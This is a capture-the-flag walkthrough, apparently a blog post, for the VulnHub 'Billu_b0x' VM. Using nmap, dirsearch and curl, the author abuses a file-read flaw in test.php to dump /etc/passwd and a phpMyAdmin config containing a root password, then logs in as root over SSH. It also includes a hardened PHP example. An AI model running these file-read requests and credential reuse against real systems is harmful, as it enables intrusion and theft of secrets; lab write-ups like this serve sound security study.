billu: b0x
Location
https://download.vulnhub.com/billu/Billu_b0x.zip
Introduction
This is the first Boot2Root from Manish Kishan Tanwar and the official description is not telling much, except that it’s using Ubuntu, PHP, MySQL and Apache. This challenge should have medium difficulty with tricks. The goal is to break into the VM using web application and from there escalate privileges to gain root access.
Getting started
Let’s see what is running on this system.
┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $sudo nmap -sV -sC -T4 -p- 192.168.56.107

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-21 15:03 CEST
Nmap scan report for 192.168.56.107
Host is up (0.00012s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 fa:cf:a2:52:c4:fa:f5:75:a7:e2:bd:60:83:3e:7b:de (DSA)
|   2048 88:31:0c:78:98:80:ef:33:fa:26:22:ed:d0:9b:ba:f8 (RSA)
|_  256 0e:5e:33:03:50:c9:1e:b3:e7:51:39:a4:4a:10:64:ca (ECDSA)
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: --==[[IndiShell Lab]]==--
MAC Address: 08:00:27:1C:31:B1 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.04 seconds
When browsing to the webserver I get a login page which invites me to do some SQL injection.
After several manual and automated tries I get no luck with the SQLi invitation. Next step is some enumeration.
┌─[n13mant@planetmars]─[~/Documents/Apps/dirsearch]
└──╼ $python3 dirsearch.py -u "http://192.168.56.107" -e php,html -x 403 -r

  _|. _ _  _  _  _ _|_    v0.3.7
 (_||| _) (/_(_|| (_| )

Extensions: php, html | Threads: 10 | Wordlist size: 5542

Error Log: /home/n13mant/Documents/Apps/dirsearch/logs/errors-17-05-10_15-15-54.log

Target: http://192.168.56.107

[15:15:54] Starting:
[15:15:58] 200 -  307B - /add
[15:15:58] 200 -  307B - /add.php
[15:16:01] 200 -    1B - /c
[15:16:05] 200 -    3KB - /head.php
[15:16:05] 301 -  317B - /images -> http://192.168.56.107/images/
[15:16:05] 200 -   47KB - /in
[15:16:05] 200 -    3KB - /index
[15:16:05] 200 -    3KB - /index.php
[15:16:09] 302 -    2KB - /panel.php -> index.php
[15:16:10] 200 -    8KB - /phpmy/
[15:16:12] 200 -    1B - /show
[15:16:13] 200 -   72B - /test.php
[15:16:13] 200 -   72B - /test
[15:16:14] Starting: phpmy/
[15:16:16] 200 -  227B - /phpmy/CREDITS
[15:16:16] 200 -   28KB - /phpmy/ChangeLog
[15:16:16] 200 -  128B - /phpmy/INSTALL
[15:16:16] 200 -    2KB - /phpmy/README
[15:16:17] 200 -  190B - /phpmy/TODO
[15:16:22] 200 -    0B - /phpmy/config.inc.php
[15:16:22] 200 -    0B - /phpmy/config.inc
[15:16:23] 200 -    3KB - /phpmy/docs
[15:16:23] 200 -   18KB - /phpmy/favicon.ico
[15:16:23] 200 -    8KB - /phpmy/export
[15:16:24] 200 -    8KB - /phpmy/import
[15:16:24] 200 -    8KB - /phpmy/import.php
[15:16:24] 200 -    8KB - /phpmy/index
[15:16:24] 200 -    8KB - /phpmy/index.php
[15:16:25] 301 -  319B - /phpmy/js -> http://192.168.56.107/phpmy/js/
[15:16:25] 301 -  326B - /phpmy/libraries -> http://192.168.56.107/phpmy/libraries/
[15:16:26] 200 -    8KB - /phpmy/main.php
[15:16:26] 200 -    8KB - /phpmy/main
[15:16:27] 200 -    8KB - /phpmy/phpinfo
[15:16:27] 200 -    8KB - /phpmy/phpinfo.php
[15:16:27] 200 -   41KB - /phpmy/phpmyadmin
[15:16:27] 200 -    8KB - /phpmy/phpinfo.php
[15:16:28] 200 -    1KB - /phpmy/print
[15:16:28] 200 -   26B - /phpmy/robots.txt
[15:16:28] 200 -    3KB - /phpmy/scripts/
[15:16:28] 301 -  324B - /phpmy/scripts -> http://192.168.56.107/phpmy/scripts/
[15:16:29] 301 -  322B - /phpmy/setup -> http://192.168.56.107/phpmy/setup/
[15:16:29] 200 -   13KB - /phpmy/setup/
[15:16:30] 200 -    8KB - /phpmy/sql.php
[15:16:30] 200 -    8KB - /phpmy/sql.php
[15:16:30] 200 -    8KB - /phpmy/sql
[15:16:31] 301 -  323B - /phpmy/themes -> http://192.168.56.107/phpmy/themes/
[15:16:32] 200 -    8KB - /phpmy/url
[15:16:32] Starting: phpmy/scripts/
[15:16:49] 200 -    5KB - /phpmy/scripts/upgrade
[15:16:50] Starting: phpmy/setup/
[15:16:59] 303 -    0B - /phpmy/setup/config
[15:16:59] 303 -    0B - /phpmy/setup/config.php
[15:16:59] 303 -    0B - /phpmy/setup/config.php
[15:17:01] 200 -   13KB - /phpmy/setup/index.php
[15:17:01] 200 -   13KB - /phpmy/setup/index
[15:17:02] 301 -  326B - /phpmy/setup/lib -> http://192.168.56.107/phpmy/setup/lib/
[15:17:05] 200 -    5KB - /phpmy/setup/scripts
[15:17:07] 200 -    7KB - /phpmy/setup/styles

Task Completed
Looks like the SQLi invitation was a distraction. Several interesting pages, including a phpMyAdmin page.
First I’ll take a look at add.php. Unfortunately it doesn’t really do anything except wasting my time.
Next one on my list is test.php. It needs a ‘file’ parameter.
┌─[n13mant@planetmars]─[~/Desktop]
└──╼ $curl -X POST --data "file=/etc/passwd" http://192.168.56.107/test.php
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:103:106::/var/run/dbus:/bin/false
whoopsie:x:104:107::/nonexistent:/bin/false
landscape:x:105:110::/var/lib/landscape:/bin/false
sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
ica:x:1000:1000:ica,,,:/home/ica:/bin/bash
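The response above is what you get when a script hands the POST ‘file’ parameter straight to a file-read call. The snippet below is an added illustration, not the source of test.php from the VM (this post never shows it): a hypothetical version of that pattern next to a hardened one that pins reads to a base directory, resolves the path with realpath() and checks it against an allowlist, so a value such as /etc/passwd or ../../phpmy/config.inc.php is refused.

```php
<?php
// Added example; hypothetical code, not the challenge's own test.php.

// Vulnerable pattern (assumed): the parameter is used as a path without any
// check, so "file=/etc/passwd" returns the system password file.
function read_file_unsafe(array $post): string
{
    if (!isset($post['file']) || $post['file'] === '') {
        return "missing 'file' parameter\n";
    }
    return (string) file_get_contents($post['file']);
}

// Hardened version: the name must be on an explicit allowlist, the path is
// resolved relative to a fixed base directory, and the resolved path must still
// lie inside that directory (realpath() collapses "../" and follows symlinks,
// so a traversal or a planted symlink cannot escape it).
function read_file_safe(array $post, string $base, array $allowed): string
{
    $name = $post['file'] ?? '';
    if (!in_array($name, $allowed, true)) {
        http_response_code(403);
        return "file not allowed\n";
    }
    $baseReal = realpath($base);
    $real     = realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($baseReal === false || $real === false
        || strncmp($real, $baseReal . DIRECTORY_SEPARATOR, strlen($baseReal) + 1) !== 0) {
        http_response_code(403);
        return "file not allowed\n";
    }
    return (string) file_get_contents($real);
}

// Example wiring: only two named files under ./public may ever be served.
echo read_file_safe($_POST, __DIR__ . '/public', ['readme.txt', 'changelog.txt']);
```

The allowlist alone would already stop the traversal; the realpath() containment check is the belt-and-braces part that keeps holding if someone later relaxes the list to a pattern match.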
Now for some credentials.
┌─[n13mant@planetmars]─[~/Desktop]
└──╼ $curl -X POST --data "file=/var/www/phpmy/config.inc.php" http://192.168.56.107/test.php
<?php

/* Servers configuration */
$i = 0;

/* Server: localhost [1] */
$i++;
$cfg['Servers'][$i]['verbose'] = 'localhost';
$cfg['Servers'][$i]['host'] = 'localhost';
$cfg['Servers'][$i]['port'] = '';
$cfg['Servers'][$i]['socket'] = '';
$cfg['Servers'][$i]['connect_type'] = 'tcp';
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['auth_type'] = 'cookie';
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = 'roottoor';
$cfg['Servers'][$i]['AllowNoPassword'] = true;

/* End of servers configuration */

$cfg['DefaultLang'] = 'en-utf-8';
$cfg['ServerDefault'] = 1;
$cfg['UploadDir'] = '';
$cfg['SaveDir'] = '';

/* rajk - for blobstreaming */
$cfg['Servers'][$i]['bs_garbage_threshold'] = 50;
$cfg['Servers'][$i]['bs_repository_threshold'] = '32M';
$cfg['Servers'][$i]['bs_temp_blob_timeout'] = 600;
$cfg['Servers'][$i]['bs_temp_log_threshold'] = '32M';

?>
Wow… that was almost too easy.
┌─[✗]─[n13mant@planetmars]─[~/Desktop]
└──╼ $ssh root@192.168.56.107 -p 22
root@192.168.56.107's password:
Welcome to Ubuntu 12.04.5 LTS (GNU/Linux 3.13.0-32-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Wed May 24 19:56:10 IST 2017

  System load:  0.0               Processes:           75
  Usage of /:   11.9% of 9.61GB   Users logged in:     0
  Memory usage: 8%                IP address for eth0: 192.168.56.107
  Swap usage:   0%

  Graph this data and manage this system at:
    https://landscape.canonical.com/

New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Your Hardware Enablement Stack (HWE) is supported until April 2017.
root@indishell:~#
Sweet. But I still got some question marks left. What about those odd pages in the DirSearch scan? What about phpMyAdmin?
It feels like I cheated with gaining the root key.
Conclusion
This was a fun challenge with some nice features. The final part was over faster than I had anticipated and I think there are maybe multiple ways to get there. But for now I’m content. Maybe at a later stage I’ll explore other options and update this post.